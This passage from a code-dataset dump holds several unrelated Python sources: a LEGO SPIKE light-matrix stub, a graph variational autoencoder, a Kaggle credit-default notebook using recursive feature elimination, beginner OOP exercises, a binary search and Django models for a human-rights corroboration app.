isinstance(x, int):\n raise TypeError(\"set_pixel x must be an int\")\n if not isinstance(y, int):\n raise TypeError(\"set_pixel y must be an int\")\n if not isinstance(brightness, int):\n raise TypeError(\"set_pixel brightness must be an int\")\n\n if not 0 <= brightness <= 100:\n raise ValueError(\"set_pixel: brightness out of range (0-100)\")\n if not 0 <= x <= 4:\n raise ValueError(\"set_pixel: x out of range (0-4)\")\n if not 0 <= y <= 4:\n raise ValueError(\"set_pixel: y out of range (0-4)\")\n\n self.current_image = \"\"\n print(\"LightMatrix::set_pixel\")\n print(\"Set %s,%s to %s brightness\", (x, y, brightness))\n\n def write(self, text):\n \"\"\" Displays text on the Light Matrix, one letter at a time, scrolling from right to left.\n\n Your program will not continue until all the letters have been shown.\n\n Parameters\n ----------\n text\n Text to write\n \"\"\"\n\n self.current_image = \"\"\n print(\"LightMatrix::write\")\n print(\"Display: %s\" % str(text))\n\n def off(self):\n \"\"\"Turn off all pixels on the light matrix\"\"\"\n\n self.current_image = \"\"\n print(\"LightMatrix::off\")\n","repo_name":"Buildy-Bots-LEGO-League/public-superpowered","sub_path":"src/spike/LightMatrix.py","file_name":"LightMatrix.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1212088387","text":"\n \n#from diff_encoder import Encoder, GNN\nfrom torch_geometric.utils import to_dense_batch, to_dense_adj\nimport os.path as osp\nfrom math import ceil\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nimport torch_geometric.transforms as T\nfrom torch_geometric.data import DenseDataLoader\nfrom torch_geometric.nn import DenseSAGEConv, dense_diff_pool,dense_mincut_pool\nimport torchvision\nimport torch_geometric\nimport torch_geometric.nn as tnn\n\nfrom torch_geometric.nn import EdgeConv, NNConv, GraphConv, DenseGCNConv\nfrom torch_geometric.nn.pool.edge_pool import EdgePooling\n\nfrom torch_geometric.nn.inits import reset\nfrom torch_geometric.nn import TopKPooling, GCNConv,GatedGraphConv, SAGPooling\nfrom torch_geometric.utils 
import (add_self_loops, sort_edge_index,\n remove_self_loops)\nfrom torch_geometric.utils.repeat import repeat\n\nclass LambdaLayer(nn.Module):\n def __init__(self, lambd):\n super(LambdaLayer, self).__init__()\n self.lambd = lambd\n def forward(self, x,a,s):\n return self.lambd(x,a,s)\n\nclass GraphAE(torch.nn.Module):\n def __init__(self,in_channels, out_channels1, out_channels2,out_channels3,out_channels4, out_channels5,out_channels6, dropout):\n super(GraphAE, self).__init__() \n\n #GAE.reset_parameters(self)\n\n self.out_channels2=out_channels2\n \n \"\"\"\n Encoding\n \"\"\"\n ### Encoding\n \"\"\"\n self.sage1=tnn.DenseGCNConv(in_channels,out_channels1)\n self.sage2=tnn.DenseGCNConv(out_channels1,out_channels2)\n self.sage3=tnn.DenseGCNConv(out_channels2,out_channels3)\n self.sage4=tnn.DenseGCNConv(out_channels3,out_channels4)\n\n self.sage5=tnn.DenseGCNConv(out_channels4,out_channels5)\n \"\"\"\n #DenseSAGEConv(in_channels, out_channels, normalize=False, bias=True)\n self.sage1=tnn.DenseSAGEConv(in_channels,out_channels1,normalize=True)\n #self.sage2=tnn.DenseSAGEConv(out_channels1,out_channels2,normalize=True)\n\n self.sage3=tnn.DenseSAGEConv(out_channels1,out_channels3,normalize=True)\n #self.sage4=tnn.DenseSAGEConv(out_channels3,out_channels4,normalize=True)\n ##self.sage42=nn.Linear(out_channels3,out_channels4)\n\n self.sage5=tnn.DenseSAGEConv(out_channels3,out_channels5,normalize=True)\n self.sage6=tnn.DenseSAGEConv(out_channels5,out_channels6,normalize=True)\n \n ##self.poolit1=tnn.DenseSAGEConv(out_channels2,400)\n self.poolit1=nn.Linear(out_channels1,250)\n self.poolit2=nn.Linear(out_channels3,50)\n #self.poolit3=nn.Linear(out_channels5,50)\n ##self.poolit2=tnn.DenseSAGEConv(out_channels4,200)\n #self.poolit3=tnn.DenseSAGEConv(out_channels5,10)\n \n\n #self.tr1=nn.Linear(out_channels5,out_channels6)\n #self.tr2=nn.Linear(out_channels5,64)\n\n self.tr2=nn.Linear(out_channels5,16)\n\n self.rev2=nn.Linear(16,out_channels5)\n \n \"\"\"\n self.revsage1=tnn.DenseGCNConv(out_channels1,in_channels)\n self.revsage2=tnn.DenseGCNConv(out_channels2,out_channels1)\n\n self.revsage3=tnn.DenseGCNConv(out_channels3,out_channels2)\n self.revsage4=tnn.DenseGCNConv(out_channels4,out_channels3)\n\n self.revsage5=tnn.DenseGCNConv(out_channels5,out_channels4)\n \"\"\"\n self.revsage1=tnn.DenseSAGEConv(out_channels1,in_channels,normalize=False)\n #self.revsage2=tnn.DenseSAGEConv(out_channels2,out_channels1,normalize=True)\n\n self.revsage3=tnn.DenseSAGEConv(out_channels3,out_channels1,normalize=False)\n\n self.revsage5=tnn.DenseSAGEConv(out_channels5,out_channels3,normalize=False)\n self.revsage6=tnn.DenseSAGEConv(out_channels6,out_channels5,normalize=False)\n\n self.drop5=torch.nn.Dropout(p=0.5)\n self.drop4=torch.nn.Dropout(p=0.4)\n self.drop3=torch.nn.Dropout(p=0.3)\n\n ## Batch Normalization\n self.bano1 = nn.BatchNorm1d(num_features=1000)\n self.bano2 = nn.BatchNorm1d(num_features=1000)\n self.bano3 = nn.BatchNorm1d(num_features=250)\n self.bano4 = nn.BatchNorm1d(num_features=50)\n self.bano5 = nn.BatchNorm1d(num_features=50)\n self.bano6 = nn.BatchNorm1d(num_features=50)\n \n #self.prelu=nn.PReLU()\n\n def upsample(self,X,A,S):\n Xout=torch.bmm(S,X)\n\n Aout=torch.bmm(S,torch.bmm(A,S.permute(0,2,1)))\n return Xout,Aout\n\n def encode(self,whole,adj,lengs,mask,maxNodes): \n ### 1 \n hidden=self.sage1(whole,adj)\n hidden=F.relu(hidden)\n hidden=self.bano1(hidden)\n hidden=self.drop5(hidden)\n \"\"\"\n ### 2\n hidden=self.sage2(hidden,adj)\n hidden=F.relu(hidden) \n hidden=self.bano2(hidden)\n 
hidden=self.drop3(hidden)\n \"\"\"\n\n ### Pool1\n pool1=self.poolit1(hidden)\n \n hidden,adj,mc1,o1=dense_mincut_pool(hidden,adj,pool1,mask)\n\n \n ### 3\n hidden=self.sage3(hidden,adj)\n hidden=F.relu(hidden) \n hidden=self.bano3(hidden)\n hidden=self.drop4(hidden)\n\n ### Pool2\n pool2=self.poolit2(hidden)\n\n hidden,adj,mc2,o2=dense_mincut_pool(hidden,adj,pool2)\n\n hidden=self.sage5(hidden,adj)\n hidden=F.relu(hidden) \n hidden=self.bano5(hidden)\n hidden=self.drop3(hidden)\n\n ### Pool3\n #pool3=self.poolit3(hidden)\n\n #hidden,adj,mc3,o3=dense_mincut_pool(hidden,adj,pool3)\n \"\"\"\n hidden=self.sage6(hidden,adj)\n hidden=F.tanh(hidden) \n hidden=self.bano6(hidden)\n hidden=self.drop3(hidden)\n \"\"\"\n\n return self.tr2(hidden),self.tr2(hidden), adj,pool1,pool2,mc1+mc2,o1+o2\n\n\n def reparametrize(self, mu, logvar):\n std = torch.exp(0.5*logvar)\n eps = torch.randn_like(std)\n return mu + eps*std\n\n def decode(self,z,adj,s1,s2,maxNodes):\n\n out1=self.rev2(z) \n out1=F.leaky_relu(out1) \n out1=self.drop3(out1)\n \"\"\"\n out1=self.revsage6(out1,adj)\n out1=F.leaky_relu(out1)\n out1=self.bano6(out1)\n out1=self.drop3(out1)\n \"\"\"\n \"\"\"\n out1,adj=self.upsample(out1,adj,s3)\n out1=F.leaky_relu(out1)\n adj=F.sigmoid(adj)\n \"\"\"\n\n out1=self.revsage5(out1,adj)\n out1=F.relu(out1)\n out1=self.bano5(out1)\n out1=self.drop3(out1)\n\n out1,adj=self.upsample(out1,adj,s2)\n out1=F.leaky_relu(out1)\n adj=F.sigmoid(adj)\n\n out1=self.revsage3(out1,adj)\n out1=F.leaky_relu(out1)\n out1=self.bano3(out1)\n out1=self.drop4(out1)\n\n out1,adj=self.upsample(out1,adj,s1)\n out1=F.leaky_relu(out1)\n adj=F.sigmoid(adj)\n\n \"\"\"\n out1=self.revsage2(out1,adj)\n out1=F.relu(out1)\n #out1=self.bano1(out1)\n out1=self.drop4(out1)\n \"\"\"\n\n out1=self.revsage1(out1,adj)\n out1=F.relu(out1)\n #out1=self.bano1(out1)\n\n return out1,adj\n\n def forward(self,x,adj,lengs,refMat,maxNodes):\n mu,logvar,adjMat,s1,s2,l1,l2 = self.encode(x,adj,lengs,refMat,maxNodes) ## mu, log sigma \n z = self.reparametrize(mu, logvar) ## z = mu + eps*sigma \n z,adjMat=self.decode(z,adjMat,s1,s2,maxNodes)\n return z, adjMat, mu, logvar,l1,l2 \n\n","repo_name":"ML4SCI/DeepFalcon","sub_path":"GNN_for_Fast_Detector_Simulation_Ali_Hariri/VAE_version2.py","file_name":"VAE_version2.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"29872408252","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nclass Config:\n name = \"EDA/Agg-RFE\"\n\n n_splits = 5\n seed = 2022\n target = \"target\"\n\n # Colab Env\n upload_from_colab = True\n api_path = \"/content/drive/MyDrive/workspace/kaggle.json\"\n drive_path = \"/content/drive/MyDrive/workspace/kaggle-amex\"\n\n # Kaggle Env\n kaggle_dataset_path = None\n\n # Reka Env\n dir_path = '/home/abe/kaggle/kaggle-amex'\n\n\n# In[2]:\n\n\nimport os\nimport json\nimport warnings\nimport shutil\nimport logging\nimport joblib\nimport random\nimport datetime\nimport sys\nimport gc\nimport multiprocessing\nimport joblib\nimport pickle\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom tqdm.auto import tqdm\nfrom IPython import get_ipython\ntqdm.pandas()\nwarnings.filterwarnings('ignore')\n\n\n# ## Environment Settings\n\n# In[3]:\n\n\nINPUT = os.path.join(Config.dir_path, 'input')\nOUTPUT = os.path.join(Config.dir_path, 'output')\nSUBMISSION = os.path.join(Config.dir_path, 'submissions')\nOUTPUT_EXP = os.path.join(OUTPUT, 
Config.name)\nEXP_MODEL = os.path.join(OUTPUT_EXP, \"model\")\nEXP_FIG = os.path.join(OUTPUT_EXP, \"fig\")\nEXP_PREDS = os.path.join(OUTPUT_EXP, \"preds\")\n\n# make dirs\nfor d in [INPUT, SUBMISSION, EXP_MODEL, EXP_FIG, EXP_PREDS]:\n os.makedirs(d, exist_ok=True)\n\n\n# ## Load data\n\n# In[4]:\n\n\ntrain = pd.read_pickle(os.path.join(INPUT, 'train_agg.pkl'), compression='gzip')\ntest = pd.read_pickle(os.path.join(INPUT, 'test_agg.pkl'), compression='gzip')\n# train = train.sample(10000)\n# test = test.sample(15000)\n\n\n# In[5]:\n\n\ntrain.info()\n\n\n# In[6]:\n\n\ntrain.head()\n\n\n# ## Evaluation Metric\n\n# In[7]:\n\n\n# https://www.kaggle.com/code/inversion/amex-competition-metric-python\n\ndef amex_metric(y_true: pd.DataFrame, y_pred: pd.DataFrame) -> float:\n\n def top_four_percent_captured(y_true: pd.DataFrame, y_pred: pd.DataFrame) -> float:\n df = (pd.concat([y_true, y_pred], axis='columns')\n .sort_values('prediction', ascending=False))\n df['weight'] = df['target'].apply(lambda x: 20 if x==0 else 1)\n four_pct_cutoff = int(0.04 * df['weight'].sum())\n df['weight_cumsum'] = df['weight'].cumsum()\n df_cutoff = df.loc[df['weight_cumsum'] <= four_pct_cutoff]\n return (df_cutoff['target'] == 1).sum() / (df['target'] == 1).sum()\n\n def weighted_gini(y_true: pd.DataFrame, y_pred: pd.DataFrame) -> float:\n df = (pd.concat([y_true, y_pred], axis='columns')\n .sort_values('prediction', ascending=False))\n df['weight'] = df['target'].apply(lambda x: 20 if x==0 else 1)\n df['random'] = (df['weight'] / df['weight'].sum()).cumsum()\n total_pos = (df['target'] * df['weight']).sum()\n df['cum_pos_found'] = (df['target'] * df['weight']).cumsum()\n df['lorentz'] = df['cum_pos_found'] / total_pos\n df['gini'] = (df['lorentz'] - df['random']) * df['weight']\n return df['gini'].sum()\n\n def normalized_weighted_gini(y_true: pd.DataFrame, y_pred: pd.DataFrame) -> float:\n y_true_pred = y_true.rename(columns={'target': 'prediction'})\n return weighted_gini(y_true, y_pred) / weighted_gini(y_true, y_true_pred)\n\n g = normalized_weighted_gini(y_true, y_pred)\n d = top_four_percent_captured(y_true, y_pred)\n\n return 0.5 * (g + d)\n\ndef lgb_amex_metric(y_true, y_pred):\n \"\"\"The competition metric with lightgbm's calling convention\"\"\"\n return ('amex',\n amex_metric(pd.DataFrame({'target': y_true}), pd.Series(y_pred, name='prediction')),\n True)\n\n\n# ## Transform data type\n\n# In[8]:\n\n\nfloat64_cols = [col for col in train.columns if train[col].dtype == 'float64']\nint64_cols = [col for col in train.columns if train[col].dtype == 'int64']\n\nprint(train.info())\nprint(test.info())\nprint()\nprint(\"-\"*50+f' data type transformation '+'-'*50)\nprint()\n\ndef transform_dtype(df):\n for col in df.columns:\n if df[col].dtype == 'float64':\n df[col] = df[col].astype('float16')\n if df[col].dtype == 'float32':\n df[col] = df[col].astype('float16')\n if df[col].dtype == 'int64':\n df[col] = df[col].astype('int8')\n if df[col].dtype == 'int32':\n df[col] = df[col].astype('int8')\n return df\n\ntrain = transform_dtype(train)\ntest = transform_dtype(test)\n\nprint(train.info())\nprint(test.info())\n\n\n# ## Prerocess\n\n# In[9]:\n\n\nfrom sklearn.preprocessing import LabelEncoder\ncat_cols = [col for col in train.columns if train[col].dtype == 'category']\n\nfor col in cat_cols:\n le = LabelEncoder()\n le.fit(train[col])\n train[col] = le.transform(train[col])\n test[col] = le.transform(test[col])\n\n\n# ## Select Features to Use\n\n# In[10]:\n\n\nfeatures = []\nunuse = ['target', 'customer_ID', 
'S_2']\n\nfor col in train.columns:\n if col not in unuse:\n features.append(col)\n\n# print(features)\n\n\n# ## Forward Selection\n\n# In[11]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(train[features].values, train[Config.target].values,\n train_size=0.8,\n random_state=Config.seed,\n shuffle=True)\n\n\n# In[12]:\n\n\nfrom sklearn.feature_selection import RFE\nfrom lightgbm import LGBMClassifier, early_stopping\n\nlgb_params = {\"learning_rate\": 0.01,\n 'num_leaves': 127,\n 'min_child_samples': 2400}\n\nfit_params = {\n 'callbacks': [early_stopping(stopping_rounds=10, verbose=0)],\n 'eval_set': [(X_test, y_test)],\n 'eval_metric': lgb_amex_metric,\n 'verbose': 0\n}\n\nmodel = LGBMClassifier(**lgb_params,\n boosting_type='gbdt',\n objective='binary',\n n_estimators=10000,\n random_state=Config.seed,\n force_col_wise=True,\n n_jobs=32,\n verbose=-1)\n\nrfe = RFE(model,\n n_features_to_select=150,\n step=4,\n verbose=1)\n\nrfe.fit(X_train, y_train, **fit_params)\n\n\n# ## Generate new train data\n\n# In[36]:\n\n\ntrain_new = pd.DataFrame(rfe.transform(train[features]),\n columns=train[features].columns.values[rfe.get_support()])\nresult = pd.DataFrame(rfe.get_support(), index=train[features].columns.values, columns=['used'])\nresult['ranking'] = rfe.ranking_\nresult = result.sort_values('ranking', ascending=True).rename({result.index.name: 'feature'}).reset_index(drop=False).rename({'index': 'feature'}, axis=1)\nresult.to_csv(f'{EXP_MODEL}/rfe_features.csv', index=False)\n\n\n# ## Training\n\n# In[ ]:\n\n\nfrom lightgbm.plotting import plot_metric\nfrom lightgbm import LGBMClassifier, early_stopping\nfrom sklearn.model_selection import StratifiedKFold\n\ndef fit_lgbm(X, y, params=None):\n models = []\n scores = []\n\n skf = StratifiedKFold(n_splits=Config.n_splits, shuffle=True, random_state=Config.seed)\n\n for fold, (train_indices, valid_indices) in enumerate(tqdm(skf.split(X, y))):\n print(\"-\"*50+f' fold{fold} '+'-'*50)\n X_train, y_train = X.iloc[train_indices], y.iloc[train_indices]\n X_valid, y_valid = X.iloc[valid_indices], y.iloc[valid_indices]\n\n model = LGBMClassifier(**params,\n boosting_type='gbdt',\n objective='binary',\n n_estimators=10000,\n random_state=Config.seed,\n force_col_wise=True,\n n_jobs=32,\n verbose=-1)\n\n model.fit(X_train, y_train,\n eval_set=[(X_train, y_train), (X_valid, y_valid)],\n eval_names=['train', 'valid'],\n eval_metric=lgb_amex_metric,\n callbacks=[early_stopping(stopping_rounds=10, verbose=0)],\n verbose=50)\n\n # ------------------- prediction -------------------\n pred = model.predict_proba(X_valid)[:, 1]\n score = amex_metric(pd.DataFrame({'target': y_valid.values}), pd.Series(pred, name='prediction'))\n\n # ------------------- plot -------------------\n plot_metric(model)\n\n # ------------------- save -------------------\n file = f'{EXP_MODEL}/lgbm_fold{fold}.pkl'\n joblib.dump(model, file)\n scores.append(score)\n models.append(model)\n print(f'fold{fold} amex meric: {score}')\n print()\n\n print(f\"OOF Score: {np.mean(scores):.5f}\")\n return models\n\ndef inference_lgbm(models, X):\n pred = np.array([model.predict_proba(X) for model in models])\n pred = np.mean(pred, axis=0)[:, 1]\n return pred\n\n\n# In[38]:\n\n\nfeature_df = pd.read_csv(f'{EXP_MODEL}/rfe_features.csv')\nfeatures = feature_df[feature_df['used'] == True].loc[:, 'feature'].values.tolist()\n\n\n# In[ ]:\n\n\nlgb_params = {\"learning_rate\": 0.01,\n 'num_leaves': 127,\n 'min_child_samples': 
2400}\n\nmodels = fit_lgbm(train[features], train[Config.target], params=lgb_params)\n# models = [joblib.load(f'{EXP_MODEL}/lgbm_fold{i}.pkl') for i in range(Config.n_splits)]\npred = inference_lgbm(models, test[features])\n\n\n# ## Plot importance\n\n# In[ ]:\n\n\ndef plot_importances(models):\n importance_df = pd.DataFrame(models[0].feature_importances_,\n index=features,\n columns=['importance'])\\\n .sort_values(\"importance\", ascending=False)\n\n plt.subplots(figsize=(len(features) // 4, 5))\n plt.bar(importance_df.index, importance_df.importance)\n plt.grid()\n plt.xticks(rotation=90)\n plt.ylabel(\"importance\")\n plt.tight_layout()\n plt.savefig(f'{EXP_FIG}/importance.png')\n\nplot_importances(models)\n\n\n# ## Submission\n\n# In[ ]:\n\n\nsub = pd.DataFrame({'customer_ID': test.index,\n 'prediction': pred})\nsub.to_csv(f'{EXP_PREDS}/submission.csv', index=False)\n\n\n# In[ ]:\n\n\nget_ipython().system(' kaggle competitions submit -c amex-default-prediction -f /home/abe/kaggle/kaggle-amex/submissions/submission.csv -m \"Recuresive Feature Elimination for Aggregation Features\"')\n\n","repo_name":"meltyyyyy/kaggle-amex","sub_path":"scripts/eda/agg/rfe.py","file_name":"rfe.py","file_ext":"py","file_size_in_byte":9900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40504003881","text":"# Create a class called rectangle has a length and width attributes. write a method to calculate area\nprint(\"--------q1--------\")\nclass rectangle:\n def __init__(self, length, width):\n self._length = length\n self._width = width\n\n def calculate_area(self):\n area = self._length * self._width / 2\n return area\n\nrec = rectangle(5,3)\nprint(rec.calculate_area())\nprint(\"--------q2--------\")\n# Do Inheritance\nclass Animal:\n def ISleep(self):\n return (\"I do sleep\")\n def IEat(self):\n return (\"I do eat\")\n def ISound(self):\n return (\"I have a sound\")\nclass Dog(Animal):\n def Sound(self):\n return (\"woof!\")\n\nmyDog = Dog()\nprint(myDog.ISound())\nprint(myDog.Sound())\nprint(\"--------q3--------\")\n# Do encapsulation\nclass bank_account:\n def __init__(self):\n self._balance = 0\n def deposit(self,e):\n self._balance += e\n return f\"Guncel bakiye: {self._balance} TRY\"\n def withdraw(self,e:int):\n if self._balance >= e:\n self._balance -= e\n return f\"Guncel bakiye: {self._balance} TRY\\nCekilen Miktar: {e}\"\n else:\n return \"unsufficient balance\"\n\nMyAccount = bank_account()\nprint(MyAccount.deposit(100))\nprint(MyAccount.deposit(100))\nprint(MyAccount.withdraw(75))\nprint(\"--------q4--------\")\n# Do Polymorphism\nclass Circle:\n def __init__(self, radius):\n self.radius = radius\n def calculate_area(self):\n return 3.14 * self.radius**2\n\nclass rectangle:\n def __init__(self, length, width):\n self._length = length\n self._width = width\n def calculate_area(self):\n area = self._length * self._width / 2\n return area\ndef calculate_area(obj):\n return obj.calculate_area()\nucgen = rectangle(10,8)\ndaire = Circle(5)\nprint(calculate_area(ucgen))\nprint(calculate_area(daire))\nprint(\"--------q5--------\")\n# Write a Python function that takes a list of numbers as a parameter and\n# returns the sum of all even numbers in the list\nsayilar = [1,2,3,4,5,6,7,8,9]\ndef even_nums(list):\n total = 0\n for i in range(len(list)):\n if (list[i] % 2) == 0:\n total += list[i]\n return total\nprint(even_nums(sayilar))\nprint(\"--------q6--------\")\n# is_prime\n\ndef is_prime(param):\n for i in range(2, param):\n if param % 
i==0:\n return False\n return True\n\nprint(is_prime(15))\nprint(\"--------q7--------\")\ndef find_max(param):\n max = param[0]\n for i in range(len(param)):\n if param[i] > max:\n max = param[i]\n return max\n\na =[4, 9, 2, 7, 11, 5]\nprint(find_max(a))\nprint(\"--------q8--------\")\n","repo_name":"aberdayy/COMP2005","sub_path":"midterm_exercise.py","file_name":"midterm_exercise.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71390019685","text":"#704. Binary Search\nfrom typing import List\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n low = 0\n high = len(nums)-1\n while low <= high:\n mid = int((high+low)/2)\n if nums[mid]==target:\n return mid\n elif nums[mid] 0:\n status = status[0]\n return status['status__status_en']\n else:\n return ''\n\n\nclass ActorRelationship(models.Model):\n \"\"\"\n The Actor Relationship model captures the interrelation between actors.\n This can include shared events, familial connections, insititutional\n relationships or rank.\n \"\"\"\n RELATION = (\n ('Parent', 'parent'),\n ('Sibling', 'sibling'),\n ('Family member', 'family member'),\n ('Superior officer', 'superior officer'),\n ('Subordinate officer', 'subordiante officer'),\n )\n relation_status = models.CharField(\n 'status', max_length=25, choices=RELATION)\n comments_en = models.TextField(blank=True, null=True)\n comments_ar = models.TextField(blank=True, null=True)\n actor = models.ForeignKey(\n Actor, blank=True, null=True, related_name='actor_b')\n\n def __unicode__(self):\n return \"%s: %s\" % (self.actor.fullname_en if self.actor else '', self.relation_status)\n\n\nclass RoleType(models.Model):\n \"\"\"\n This object stores RoleTypes\n \"\"\"\n name_en = models.CharField(max_length=255, blank=True, null=True)\n name_ar = models.CharField(max_length=255, blank=True, null=True)\n description_en = models.CharField(max_length=255, blank=True, null=True)\n description_ar = models.CharField(max_length=255, blank=True, null=True)\n\n def __unicode__(self):\n return self.name_en\n\n\nclass RelationType(models.Model):\n \"\"\"\n This object stores RelationTypes\n \"\"\"\n name_en = models.CharField(max_length=255, blank=True, null=True)\n name_ar = models.CharField(max_length=255, blank=True, null=True)\n description_en = models.CharField(max_length=255, blank=True, null=True)\n description_ar = models.CharField(max_length=255, blank=True, null=True)\n\n def __unicode__(self):\n return self.name_en\n\n\nclass ActorRole(models.Model):\n \"\"\"\n This object model captures the role of a given actor\n in relation to either an Incident or a Bulletin.\n \"\"\"\n ROLE_STATUS = (\n ('V', 'Victim'),\n ('WN', 'Witness'),\n ('P', 'Perpetrator'),\n ('A', 'Appeared'),\n ('O', 'Other'),\n )\n RELATION = (\n ('P', 'Parent'),\n ('S', 'Sibling'),\n ('FM', 'Family member'),\n ('SPO', 'Superior officer'),\n ('SBO', 'Subordinate officer'),\n )\n\n role_en = models.CharField(\n max_length=255,\n blank=True,\n null=True)\n role_ar = models.CharField(\n max_length=255,\n blank=True,\n null=True)\n role_status = models.CharField(\n 'status',\n max_length=25,\n choices=ROLE_STATUS,\n blank=True,\n null=True\n )\n\n relation_status = models.CharField(\n 'status',\n max_length=25,\n choices=RELATION,\n blank=True,\n null=True\n )\n role = models.ForeignKey(RoleType, blank=True, null=True)\n relation = models.ForeignKey(RelationType, blank=True, null=True)\n comments_en = 
models.TextField(blank=True, null=True)\n comments_ar = models.TextField(blank=True, null=True)\n actor = models.ForeignKey(Actor, blank=True, null=True)\n\n def __unicode__(self):\n if self.relation_status is not None:\n return \"%s: %s: %s\" % (self.id, self.relation_status, self.actor.id if self.actor else '')\n else:\n return \"%s: %s: %s\" % (self.id, self.role_status, self.actor.id if self.actor else '')\n\n\nclass BulletinBootstrapManager(models.Manager):\n '''\n format the actors for bootstrapping to make them compatible with tastypie\n api calls\n '''\n\n def filter(self, *args, **kwargs):\n results = super(BulletinBootstrapManager, self).filter(*args, **kwargs)\n # do something with results\n bulletin_fields = [\n 'bulletin_comments', 'bulletin_imported_comments',\n 'bulletin_locations', 'bulletin_labels',\n 'bulletin_sources', 'most_recent_status_bulletin',\n 'count_actors', 'actor_roles_status', 'ref_incidents',\n 'assigned_user', 'sources_count', 'times', 'ref_bulletins',\n 'locations', 'labels', 'sources', 'medias', 'resource_uri',\n ]\n actor_fields = ['actors', 'actors_role', ]\n from corroborator_app.index_meta_prep.bulletinPrepIndex import (\n BulletinPrepMeta)\n from corroborator_app.index_meta_prep.actorPrepIndex import (\n ActorPrepMeta\n )\n bulletin_prep = BulletinPrepMeta()\n actor_prep = ActorPrepMeta()\n bootstrap_results = []\n for result in results:\n updated_bulletin = serializers.serialize('json', [result])\n updated_bulletin = json.loads(updated_bulletin)[0]['fields']\n updated_bulletin['id'] = result.id\n for field in bulletin_fields:\n prep_func = getattr(\n bulletin_prep,\n 'prepare_' + field\n )\n updated_bulletin[field] = prep_func(result)\n for field in actor_fields:\n prep_func = getattr(\n actor_prep,\n 'prepare_' + field\n )\n updated_bulletin[field] = prep_func(result)\n if updated_bulletin['confidence_score'] is None:\n updated_bulletin['confidence_score'] = ''\n bootstrap_results.append(updated_bulletin)\n return bootstrap_results\n\n\nclass Bulletin(models.Model):\n \"\"\"\n This model represents the Bulletin object. 
It is intended\n to capture the relationship specifically between Media objects,\n chronological events and Actors' roles.\n \"\"\"\n TYPE = (\n ('Video', 'video'),\n ('Picture', 'picture'),\n ('Report', 'report'),\n ('News', 'news'),\n )\n objects = models.Manager()\n bootstrap_bulletins = BulletinBootstrapManager()\n\n seq_order = models.IntegerField(blank=True, null=True)\n title_en = models.CharField(max_length=255)\n title_ar = models.CharField(max_length=255, blank=True)\n description_en = models.TextField(blank=True, null=True)\n description_ar = models.TextField(blank=True, default='')\n uri = models.CharField('Media Link', max_length=255, blank=True, null=True)\n confidence_score = models.IntegerField(\n 'confidence score', blank=True, null=True)\n type = models.CharField('type', max_length=25, choices=TYPE, blank=True)\n bulletin_created = models.DateTimeField(auto_now_add=True)\n bulletin_modified = models.DateTimeField(auto_now=True)\n\n origin_id = models.CharField(max_length=255, blank=True, null=True)\n \"\"\"\n This field tracks whether the entitiy has been deleted and should thus be\n ignored by the UI\n \"\"\"\n deleted = models.BooleanField(default=False)\n\n # foreign key fields\n assigned_user = models.ForeignKey(User, blank=True, null=True)\n\n # ManyToManyFields\n sources = models.ManyToManyField(Source, blank=True)\n bulletin_comments = models.ManyToManyField(Comment, blank=True)\n bulletin_imported_comments = models.ManyToManyField(\n Comment,\n blank=True,\n related_name=\"bulletin_imported_comments\"\n )\n labels = models.ManyToManyField(Label, blank=True)\n times = models.ManyToManyField(TimeInfo, blank=True)\n\n actors_role = models.ManyToManyField(ActorRole, blank=True)\n medias = models.ManyToManyField(Media, blank=True)\n locations = models.ManyToManyField(Location, blank=True)\n ref_bulletins = models.ManyToManyField('self', blank=True)\n\n def __unicode__(self):\n return self.title_en\n\n def get_time_length(self):\n \"\"\"\n This method returns the time range for a given Bulletin event.\n It is used by Django Haystack in construction of the Solr Index.\n TODO: this is common to more than one model - extract it to a\n method\n \"\"\"\n time = self.times.aggregate(\n lowest=Min('time_from'), highest=Max('time_to'))\n string = ''\n\n if(len(time) > 0):\n if time[\"lowest\"] is not None and time[\"highest\"] is not None:\n duration = (time[\"lowest\"] - time[\"highest\"]).days\n date_length = time[\"highest\"].strftime('%Y/%m/%d') + '→'\\\n + time[\"lowest\"].strftime('%Y/%m/%d')\n string = '{0}' +\\\n '({1} days)'\n string = string.format(date_length, str(duration))\n return string\n\n def most_recent_update_by(self):\n \"\"\"\n Returns the id of the las user you created an update for the\n given Bulletin\n \"\"\"\n user_id = self.bulletin_comments.values('status__user')\\\n .order_by('-comment_created')\n return user_id\n\n def most_recent_status_bulletin(self):\n \"\"\"\n This method returns the most recent status for a given Bulletin event.\n It is used by Django Haystack in construction of the Solr Index.\n \"\"\"\n\n status = self.bulletin_comments.values('status__status_en')\\\n .order_by('-comment_created')\n if len(status) > 0:\n status = status[0]\n return status['status__status_en']\n else:\n return ''\n\n\nclass Incident(models.Model):\n \"\"\"\n This class defined the Incident object Model. 
The\n object is intended to capture the meta level relationship between\n Bulletins, Actors and Events.\n \"\"\"\n incident_details_en = models.TextField(blank=True, null=True)\n incident_details_ar = models.TextField(blank=True, null=True)\n confidence_score = models.IntegerField(\n 'confidence score', blank=True, null=True)\n title_en = models.TextField()\n title_ar = models.TextField(blank=True)\n incident_created = models.DateTimeField(auto_now_add=True)\n incident_modified = models.DateTimeField(auto_now=True)\n\n assigned_user = models.ForeignKey(User, blank=True, null=True)\n\n incident_comments = models.ManyToManyField(Comment, blank=True)\n ref_bulletins = models.ManyToManyField(Bulletin, blank=True)\n actors_role = models.ManyToManyField(ActorRole, blank=True)\n crimes = models.ManyToManyField(CrimeCategory, blank=True)\n labels = models.ManyToManyField(Label, blank=True)\n times = models.ManyToManyField(TimeInfo, blank=True)\n locations = models.ManyToManyField(Location, blank=True)\n ref_incidents = models.ManyToManyField('self', blank=True)\n \"\"\"\n This field tracks whether the entitiy has been deleted and should thus be\n ignored by the UI\n \"\"\"\n deleted = models.BooleanField(default=False)\n\n def 